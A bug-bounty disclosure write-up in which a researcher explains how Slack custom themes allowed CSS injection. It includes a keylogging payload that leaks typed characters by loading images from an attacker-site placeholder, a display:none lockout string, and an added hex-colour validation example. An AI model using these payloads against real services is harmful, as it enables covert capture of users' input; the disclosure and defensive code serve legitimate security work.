Back in August I found a vulnerability in Slack which allowed me to keylog Slack input via custom themes. I came across this vulnerability when we were having some discussions in my work’s Slack regarding using CSS to change the font to comic-sans, as seen below:


Neat, right? However, this is pretty harmless and likely wouldn’t result in a bounty - maybe a low for no input sanitization. However, I was determined to find a way in which this could genuinely become dangerous. A co-worker, d12, pointed out that #FFFFFF;} html {display:none;} could be used to prevent the user’s Slack instance from rendering, which is certainly much worse than just changing fonts. It should be noted that once one Slack instance was modified, all other instances were also modified, since the theme was persisted across clients (yes… I managed to lock myself out of multiple Slack test instances).

However, my ultimate goal was data exfiltration… wouldn’t it be great if we could see all the links to cat memes in the Slack instance we’re not a part of? This is the point at which I learned that CSS supports attribute selectors for specific values. More specifically, CSS allows you to determine the most recent value added to any type of input via the [value$="<value>"] selector. Furthermore, Slack allows loading of external images. With this knowledge, I present to you my very own custom Slack theme:

#FFFFFF;}INPUT[TYPE="TEXT"][VALUE$="A"] { BACKGROUND-IMAGE: URL("https://attacker-site/A"); },#350d36,#1264A3,#FFFFFF,#350D36,#FFFFFF,#2BAC76,#CD2553

This theme is capable of determining when the user types the letter A into an <input type="text"> on Slack. When the user does this, the CSS will load the background image https://attacker-site/A, which can then be logged server side to indicate the user typed the letter A. This was as much of a PoC as I needed to demo to Slack that it was indeed possible to exfiltrate data, provided the user actually applied the custom theme. Thankfully, the 1-click custom theme option was not exploitable, so it still required the user to copy/paste the theme, which would certainly raise suspicions.
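The post puts the root cause down to missing input sanitization on the theme string. One way to close that gap, shown here as an added example that is not from the original post or from Slack's code: accept a theme only if every comma-separated entry is a plain #RRGGBB colour, and build CSS from the validated values alone. The function names and CSS variable names are hypothetical.

```javascript
// Added example: strict allowlist validation for a comma-separated colour theme.
// validateTheme, themeToCss and the --theme-colour-N names are hypothetical.
const HEX_COLOUR = /^#[0-9a-f]{6}$/i;

function validateTheme(theme) {
  if (typeof theme !== "string") {
    return { ok: false, errors: [{ index: -1, reason: "theme is not a string" }] };
  }
  const tokens = theme.split(",").map((t) => t.trim());
  const errors = [];
  tokens.forEach((token, index) => {
    if (!HEX_COLOUR.test(token)) {
      // Report the position only; never echo rejected text back into markup.
      errors.push({ index, reason: "not a #RRGGBB colour" });
    }
  });
  return errors.length
    ? { ok: false, errors }
    : { ok: true, colours: tokens.map((t) => t.toUpperCase()) };
}

// Build CSS only from validated values, so no entry can close the
// declaration block and start a rule of its own.
function themeToCss(theme) {
  const result = validateTheme(theme);
  if (!result.ok) return null;
  const decls = result.colours.map((c, i) => `  --theme-colour-${i}: ${c};`);
  return `:root {\n${decls.join("\n")}\n}`;
}

// Inputs: the two theme values quoted in the post, plus a constructed clean
// list (the post's theme with its first entry reduced to a plain colour).
const injected =
  '#FFFFFF;}INPUT[TYPE="TEXT"][VALUE$="A"] { BACKGROUND-IMAGE: URL("https://attacker-site/A"); }' +
  ",#350d36,#1264A3,#FFFFFF,#350D36,#FFFFFF,#2BAC76,#CD2553";
const hideAll = "#FFFFFF;} html {display:none;}";
const clean = "#FFFFFF,#350d36,#1264A3,#FFFFFF,#350D36,#FFFFFF,#2BAC76,#CD2553";

console.log(validateTheme(injected)); // rejected: entry 0 is not a colour
console.log(validateTheme(hideAll));  // rejected: entry 0 is not a colour
console.log(themeToCss(clean));       // :root block with eight custom properties
```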

Here’s the PoC video I sent Slack of the request being logged locally. Note how I go into channels instead of typing a message; that’s because the channel option used a text input while the message input was more complicated. I’m sure it would have been possible to write some CSS to select on the attributes there, but this was enough to prove exfil was even possible.

PoC exploit video

Slack has kindly decided to disclose the vulnerability on HackerOne.


For finding this vulnerability, Slack awarded me $500. I’m using that money to match donations to my Movember campaign. If you’d like to learn more or donate, click here.